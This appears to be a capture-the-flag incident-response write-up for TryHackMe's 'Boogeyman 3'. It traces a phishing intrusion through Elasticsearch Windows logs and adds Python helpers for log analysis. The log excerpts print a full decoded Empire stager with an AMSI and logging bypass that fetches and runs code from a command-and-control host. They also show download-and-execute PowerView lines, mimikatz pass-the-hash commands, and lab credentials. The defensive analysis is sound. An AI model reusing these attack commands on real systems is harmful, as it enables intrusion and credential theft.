Boogeyman 3
The Boogeyman emerges from the darkness again.
Last updated
Challenge Link: TryHackMe - Boogeyman 3
Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.
The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.
Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.
In addition, the security team also observed a file inside the ISO payload, as shown in the image below.
Lastly, it was presumed by the security team that the incident occurred between August 29 and August 30, 2023.
There are multiple services running for this room:
$ nmap --min-rate 1000 -p- -v 10.10.138.205
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9200/tcp open wap-wsp
9300/tcp open vrace
These belong to a hosted ELK Stack application, meaning TCP port 9200 should be the Elasticsearch REST API (nmap labels it wap-wsp only because no service detection was run).
There seems to be Windows Event Logs ingested into the platform:
$ curl http://elastic:elastic@10.10.241.17:9200/_cat/indices?v
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open .geoip_databases lM0DBBCZRzeTnKl49aAmJA 1 0 3 0 2.6mb 2.6mb
green open .security-7 Fp59LRkXSwm1jHrq8gpibg 1 0 60 0 258kb 258kb
green open .apm-custom-link Ek1KihMXRwOoAIGOBcIU-w 1 0 0 0 226b 226b
green open .kibana_task_manager_7.17.6_001 WSbAubYpTRmGec9_aFSUHg 1 0 18 3447 1.4mb 1.4mb
green open .apm-agent-configuration ffMaJ0oFQZKgTziSPYgewg 1 0 0 0 226b 226b
green open .async-search 2-WPoD_4QpOoKpd0SBYM2g 1 0 0 0 252b 252b
green open .kibana_7.17.6_001 lXdTCB9mRHm56zAO4YZ50A 1 0 42 0 4.8mb 4.8mb
yellow open winlogbeat-7.17.6-2023.11.02-000002 CDv3Ai6xSvu2HhxvzaUcjA 1 1 0 0 226b 226b
yellow open winlogbeat-7.17.6-2023.08.29-000001 9g4EM-4oRImckEii7zspjg 1 1 29093 0 47.6mb 47.6mb
green open .tasks 7kEiTgXrTwmguQ3TbIgUHA 1 0 12 0 57.7kb 57.7kb
Using the following JSON query to see what the analyst will be dealing with:
{
  "query": {
    "bool": {
      "must": {
        "wildcard": {
          "user.name": "*"
        }
      },
      "should": [{
        "match": {
          "event.category": "process"
        }
      }],
      "filter": {
        "range": {
          "@timestamp": {
            "gte": "2023-08-29T00:00:00",
            "lte": "2023-08-31T00:00:00"
          }
        }
      }
    }
  },
  "_source": ["user.name", "host.hostname"]
}
For the first 10000 logs based on process creations within the specified timeframe, the bulk was generated by evan.hutchinson and allan.smith:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".user.name' | sort | uniq -c | sort -nr
5337 evan.hutchinson
1837 allan.smith
1767 Administrator
427 DC01$
385 SYSTEM
104 WKSTN-0051$
42 itadmin
22 WKSTN-1327$
22 LOCAL SERVICE
21 NETWORK SERVICE
[..omitted..]
Now, looking at the number of endpoints with process creation logs, more than half were generated on WKSTN-0051, which will now be assumed to be the workstation of evan.hutchinson:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".host.hostname' | sort | uniq -c | sort -nr
5695 WKSTN-0051
2174 DC01
2131 WKSTN-1327
For this section, the following JSON query will be utilized, but the value of user.name will be changed depending on the user being investigated:
{
  "query": {
    "bool": {
      "must": {
        "term": {
          "user.name": "<USERNAME OF INTEREST>"
        }
      },
      "should": [{
        "match": {
          "event.category": "process"
        }
      }],
      "filter": {
        "range": {
          "@timestamp": {
            "gte": "2023-08-29T00:00:00",
            "lte": "2023-08-31T00:00:00"
          }
        }
      }
    }
  },
  "_source": ["@timestamp", "host.hostname", "user.name", "user.domain", "process.name", "process.command_line", "process.pid", "process.parent.name", "process.parent.executable", "process.parent.pid"]
}
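The two query bodies above differ only in their must clause and their _source list, and every result is then counted with the same sort | uniq -c | sort -nr pipeline. The Python below is an added example, not part of this write-up: it builds the request body from one parameterised function and reproduces the counting over a constructed set of hits (the function names build_query, get_path and count_field are mine). One caveat it makes explicit: in a bool query that already carries a must clause, should clauses only affect scoring and do not filter unless minimum_should_match is set, so the event.category match in the queries above is optional as written; the example sets it to 1.

```python
"""Parameterised form of the investigation queries used in this write-up, plus
the `sort | uniq -c | sort -nr` counting done in Python. Added example; the
query shape follows the page, the helper names and sample hits are mine."""
import json
from collections import Counter

# Index name and time window as used on the page.
INDEX = "winlogbeat-7.17.6-2023.08.29-000001"
WINDOW = ("2023-08-29T00:00:00", "2023-08-31T00:00:00")


def build_query(must_field, must_value, category, source_fields,
                window=WINDOW, size=10000):
    """Return an Elasticsearch request body equivalent to the page's queries.

    A value containing '*' becomes a wildcard clause (the first query on the
    page), anything else a term clause (the per-user / per-pid queries).
    `minimum_should_match: 1` is set explicitly: when a bool query has a
    `must` clause, `should` clauses default to optional and only affect
    scoring, so without it the event.category match would not filter at all.
    """
    must = ({"wildcard": {must_field: must_value}} if "*" in must_value
            else {"term": {must_field: must_value}})
    return {
        "size": size,
        "query": {
            "bool": {
                "must": must,
                "should": [{"match": {"event.category": category}}],
                "minimum_should_match": 1,
                "filter": {"range": {"@timestamp": {"gte": window[0],
                                                    "lte": window[1]}}},
            }
        },
        "_source": list(source_fields),
    }


def get_path(doc, dotted):
    """Fetch a dotted field such as 'process.parent.pid' from a nested _source."""
    cur = doc
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def count_field(hits, dotted):
    """Equivalent of `jq -r '...' | sort | uniq -c | sort -nr` over search hits."""
    counter = Counter(str(get_path(h.get("_source", h), dotted)) for h in hits)
    return counter.most_common()


# Constructed sample hits: shape mirrors winlogbeat _source, values invented.
SAMPLE_HITS = [
    {"_source": {"user": {"name": "evan.hutchinson"}, "host": {"hostname": "WKSTN-0051"}}},
    {"_source": {"user": {"name": "evan.hutchinson"}, "host": {"hostname": "WKSTN-0051"}}},
    {"_source": {"user": {"name": "allan.smith"}, "host": {"hostname": "WKSTN-1327"}}},
    {"_source": {"user": {"name": "DC01$"}, "host": {"hostname": "DC01"}}},
]

if __name__ == "__main__":
    body = build_query("user.name", "*", "process", ["user.name", "host.hostname"])
    print(json.dumps(body, indent=2))  # usable as the -d payload of curl, as on the page
    print(count_field(SAMPLE_HITS, "user.name"))
    print(count_field(SAMPLE_HITS, "host.hostname"))
```

Passing size inside the body rather than as ?size= on the URL is equivalent; keeping it in the body means the whole query is in one file that can be attached to the case notes.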
Upon execution of the HTA file (PID 6392), three new processes were spawned:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6392
2023-08-29T23:51:15.856Z evan.hutchinson 6392 2940 "C:\Windows\SysWOW64\mshta.exe" "D:\ProjectFinancialSummary_Q3.pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2023-08-29T23:51:16.738Z evan.hutchinson 3832 6392 "C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
2023-08-29T23:51:16.771Z evan.hutchinson 3680 6392 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:51:16.809Z evan.hutchinson 6204 6392 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;
It copies an implant into the user's Temp directory and executes a function, DllRegisterServer, from review.dat via rundll32.exe. It then creates a scheduled task (named Review), presumably for persistence:
$A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer';
$T = New-ScheduledTaskTrigger -Daily -At 06:00;
$S = New-ScheduledTaskSettingsSet;
$P = New-ScheduledTaskPrincipal $env:username;
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S;
Register-ScheduledTask Review -InputObject $D -Force;
Tracing the executions of review.dat to figure out what it does, the related PIDs were searched:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 3680
2023-08-29T23:51:16.771Z evan.hutchinson 3680 6392 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:51:17.116Z evan.hutchinson 4672 3680 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 4672
2023-08-29T23:51:17.116Z evan.hutchinson 4672 3680 "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
2023-08-29T23:53:47.951Z evan.hutchinson 6660 4672 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-29T23:54:12.765Z evan.hutchinson 5496 4672 "C:\Windows\system32\net.exe" users
2023-08-29T23:54:16.129Z evan.hutchinson 6932 4672 "C:\Windows\system32\net.exe" localgroup administrators
2023-08-29T23:54:48.565Z evan.hutchinson 4504 4672 "C:\Windows\system32\whoami.exe" /groups
2023-08-29T23:54:48.608Z evan.hutchinson 4468 4672 "C:\Windows\system32\whoami.exe" /groups
2023-08-29T23:54:49.043Z evan.hutchinson 5308 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-29T23:54:49.213Z evan.hutchinson 5180 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-30T01:40:37.178Z evan.hutchinson 2260 4672 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc 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}"
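The chain above was followed by re-running the same curl pipeline with a new grep for each PID. The Python below is an added example, not part of this write-up: it rebuilds the parent/child tree once from process-creation events and lists or renders every descendant of a PID. The sample events are trimmed copies of the command lines already shown above for WKSTN-0051; the function names are mine.

```python
"""Rebuild a process tree from process-creation events and walk the
descendants of a PID, replacing repeated `grep <pid>` passes.
Added example, not from the write-up; sample events are trimmed copies of
the page's output, function names are mine."""
from collections import defaultdict

# Constructed sample: (timestamp, user, pid, ppid, command_line), trimmed
# from the process creation output quoted above for WKSTN-0051.
EVENTS = [
    ("2023-08-29T23:51:15.856Z", "evan.hutchinson", 6392, 2940, 'mshta.exe "D:\\ProjectFinancialSummary_Q3.pdf.hta"'),
    ("2023-08-29T23:51:16.738Z", "evan.hutchinson", 3832, 6392, "xcopy.exe /s /i /e /h D:\\review.dat ...\\Temp\\review.dat"),
    ("2023-08-29T23:51:16.771Z", "evan.hutchinson", 3680, 6392, "rundll32.exe D:\\review.dat,DllRegisterServer"),
    ("2023-08-29T23:51:16.809Z", "evan.hutchinson", 6204, 6392, "powershell.exe ... Register-ScheduledTask Review ..."),
    ("2023-08-29T23:51:17.116Z", "evan.hutchinson", 4672, 3680, "rundll32.exe D:\\review.dat,DllRegisterServer"),
    ("2023-08-29T23:53:47.951Z", "evan.hutchinson", 6660, 4672, 'cmd.exe /c "whoami /all"'),
    ("2023-08-29T23:54:49.213Z", "evan.hutchinson", 5180, 4672, "fodhelper.exe"),
    ("2023-08-29T23:54:49.444Z", "evan.hutchinson", 7116, 5180, "powershell.exe -NoP -NonI -W Hidden -c $x=..."),
    ("2023-08-29T23:54:50.125Z", "evan.hutchinson", 6160, 7116, "powershell.exe -NoP -NonI -W Hidden -enc ..."),
]


def build_tree(events):
    """Map each parent PID to its children, ordered by creation time.

    Windows reuses PIDs, so on real data key by (host, pid, creation time)
    or at least check that a PID is not created twice inside the window;
    the sample here has no reuse, so the PID alone is enough.
    """
    by_pid = {}
    children = defaultdict(list)
    for ts, user, pid, ppid, cmd in sorted(events):
        by_pid[pid] = (ts, user, ppid, cmd)
        children[ppid].append(pid)
    return by_pid, children


def descendants(children, root):
    """Depth-first list of every PID reachable from `root` (root excluded)."""
    out, stack = [], list(reversed(children.get(root, [])))
    while stack:
        pid = stack.pop()
        out.append(pid)
        stack.extend(reversed(children.get(pid, [])))
    return out


def render(by_pid, children, root, depth=0):
    """Indented text view of the subtree under `root`, root included."""
    ts, user, ppid, cmd = by_pid[root]
    lines = [f"{'  ' * depth}{ts} {user} pid={root} ppid={ppid} {cmd}"]
    for child in children.get(root, []):
        lines.extend(render(by_pid, children, child, depth + 1))
    return lines


if __name__ == "__main__":
    by_pid, children = build_tree(EVENTS)
    print("\n".join(render(by_pid, children, 6392)))  # whole tree under mshta.exe
```

Rendering from PID 6392 shows the full mshta.exe → rundll32.exe → rundll32.exe → fodhelper.exe → powershell.exe chain in one view, which is what the separate greps above reconstruct step by step.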
The attacker seems to have gained local administrator privileges on WKSTN-0051 as the user evan.hutchinson, based on the sequence of user enumeration commands and the eventual execution of fodhelper.exe, which is commonly used for UAC bypass on Windows 10. It is also important to note that the last execution discovered above was a lateral movement attempt to WKSTN-1327 as allan.smith. For now, looking into executions spawned from fodhelper.exe:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 5180
2023-08-29T23:54:49.213Z evan.hutchinson 5180 4672 "C:\Windows\system32\fodhelper.exe"
2023-08-29T23:54:49.444Z evan.hutchinson 7116 5180 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
It reads a base64-encoded string from the registry value Update under HKCU:\Software\Microsoft\Windows Update and runs it via PowerShell. The decoded command can be recovered from the logs by following the execution chain:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7116
2023-08-29T23:54:49.444Z evan.hutchinson 7116 5180 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
2023-08-29T23:54:50.125Z evan.hutchinson 6160 7116 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -enc 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
$ echo "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" | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=TpmUDibXpfiUU1/mwqwmentgb3I=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d
http://cdn.bananapeelparty.net:80
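Decoding by hand with base64 -d, as above, needs a second pass for the inner literal. The Python below is an added example, not part of this write-up: it decodes a -enc argument (base64 over UTF-16LE), finds every nested FromBase64String('...') literal and decodes that too, then pulls out the URL and URI path as indicators. The inner base64 literal is the one shown on the page; the outer stager around it is constructed here and reduced to the assignments that matter (no network code), and the function names are mine.

```python
"""Peel the layers of a `powershell -enc` payload offline.
Added example, not part of the write-up: the inner base64 literal is the one
from the page, the outer wrapper is constructed, the function names are mine."""
import base64
import re

# Inner literal exactly as quoted on the page (UTF-16LE text, base64 encoded).
INNER_B64 = "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA"


def decode_enc(b64_text):
    """Decode the argument of `powershell -enc`: base64 over UTF-16LE."""
    return base64.b64decode(b64_text).decode("utf-16le")


def encode_enc(script):
    """Inverse of decode_enc; used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def inner_literals(script):
    """Decode every nested FromBase64String('...') literal in a script.

    Empire wraps the literal in [Text.Encoding]::Unicode.GetString, so the
    bytes are UTF-16LE; the NUL bytes give that away. Other scripts may pass
    ASCII/UTF-8, and anything undecodable is returned as hex.
    """
    out = []
    for m in B64_LITERAL.finditer(script):
        raw = base64.b64decode(m.group(1))
        try:
            text = raw.decode("utf-16le") if b"\x00" in raw else raw.decode("utf-8")
        except UnicodeDecodeError:
            text = raw.hex()
        out.append(text)
    return out


URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?")


def extract_indicators(enc_payload):
    """Decode a -enc payload and its nested literals; return layers, URLs, paths."""
    script = decode_enc(enc_payload)
    layers = [script] + inner_literals(script)
    urls = sorted({u for layer in layers for u in URL_RE.findall(layer)})
    # Empire stagers assign the staging URI to $t, as seen in the decoded script.
    paths = re.findall(r"\$t='(/[^']*)'", script)
    return {"layers": layers, "urls": urls, "uri_paths": paths}


# Constructed outer stager: the shape of the decoded script on the page,
# reduced to the server and path assignments.
SAMPLE_SCRIPT = (
    "$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
    + INNER_B64 + "')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);"
)
SAMPLE_ENC = encode_enc(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = extract_indicators(SAMPLE_ENC)
    print(result["urls"], result["uri_paths"])
```

The same function applies unchanged to the full -enc strings recorded in the process.command_line field, which is where a blocklist check for the recovered host or a hunt across other endpoints would start.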
It is an Empire stager and calls back to cdn.bananapeelparty.net:80 or 165.232.170.151:80:
$ cat query_net.json
{
  "query": {
    "bool": {
      "must": {
        "term": {
          "process.pid": "6160"
        }
      },
      "should": [{
        "match": {
          "event.category": "network"
        }
      }],
      "filter": {
        "range": {
          "@timestamp": {
            "gte": "2023-08-29T00:00:00",
            "lte": "2023-08-31T00:00:00"
          }
        }
      }
    }
  },
  "_source": ["@timestamp", "host.hostname", "source.ip", "source.port", "destination.ip", "destination.port"]
}
$ curl -d "$(cat query_net.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | jq -r '"\(.host.hostname)\t\(.destination.ip):\(.destination.port)"' | sort | uniq -c | sort -nr
2424 WKSTN-0051 165.232.170.151:80
23 WKSTN-0051 null:null
5 WKSTN-0051 10.10.97.43:389
2 WKSTN-0051 185.199.110.133:443
1 WKSTN-0051 185.199.111.133:443
1 WKSTN-0051 185.199.109.133:443
1 WKSTN-0051 140.82.121.3:443
Following the commands associated with the Empire stager, the attacker performed enumeration targeting the domain and proceeded to download and execute mimikatz.exe, where they were able to authenticate as itadmin via Pass-the-Hash:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-29T23:55:17.945Z evan.hutchinson 4896 6160 "C:\Windows\system32\cmd.exe" /c "whoami /all"
2023-08-30T00:06:38.162Z evan.hutchinson 7736 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainComputer"
2023-08-30T00:08:56.421Z evan.hutchinson 6328 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-Domain"
2023-08-30T00:09:23.529Z evan.hutchinson 4844 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainUser"
2023-08-30T00:09:57.186Z evan.hutchinson 6968 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
2023-08-30T00:10:15.314Z evan.hutchinson 5532 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
2023-08-30T00:11:26.438Z evan.hutchinson 4948 6160 "C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2023-08-30T00:13:37.090Z evan.hutchinson 1892 6160 "C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
[..omitted..]
Using Invoke-ShareFinder from PowerView.ps1, the attacker seems to have discovered credentials for allan.smith in a file named IT_Automation.ps1, and executed commands on WKSTN-1327 remotely via Invoke-Command:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-30T00:14:36.078Z evan.hutchinson 3312 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Invoke-ShareFinder"
2023-08-30T00:18:38.647Z evan.hutchinson 3288 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "ls FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles"
2023-08-30T00:19:52.889Z evan.hutchinson 4820 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "cat FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles\IT_Automation.ps1"
2023-08-30T00:20:23.384Z evan.hutchinson 7952 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList (" "QUICKLOGISTICS\allan.smith, (ConvertTo-SecureString Tr!ckyP@ssw0rd987 -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
2023-08-30T00:20:56.818Z evan.hutchinson 6848 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
[..omitted..]
Another Empire stager was executed on the new workstation using the same method:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160
[..omitted..]
2023-08-30T00:21:52.606Z evan.hutchinson 4976 6160 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc 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}"
$ echo "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" | base64 -d
If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
$ echo 'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA' | base64 -d
http://cdn.bananapeelparty.net:80
Confirming whether the Invoke-Command executions were successful: the commands were spawned under wsmprovhost.exe (the WinRM host process) as allan.smith, meaning the attempt went through:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort
2023-08-30T00:20:59.159Z allan.smith 4892 752 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T00:20:59.718Z allan.smith 5076 4892 "C:\Windows\system32\whoami.exe"
2023-08-30T00:21:53.053Z allan.smith 6788 752 C:\Windows\system32\wsmprovhost.exe -Embedding
2023-08-30T00:21:53.284Z allan.smith 6708 6788 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc 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
[..omitted..]
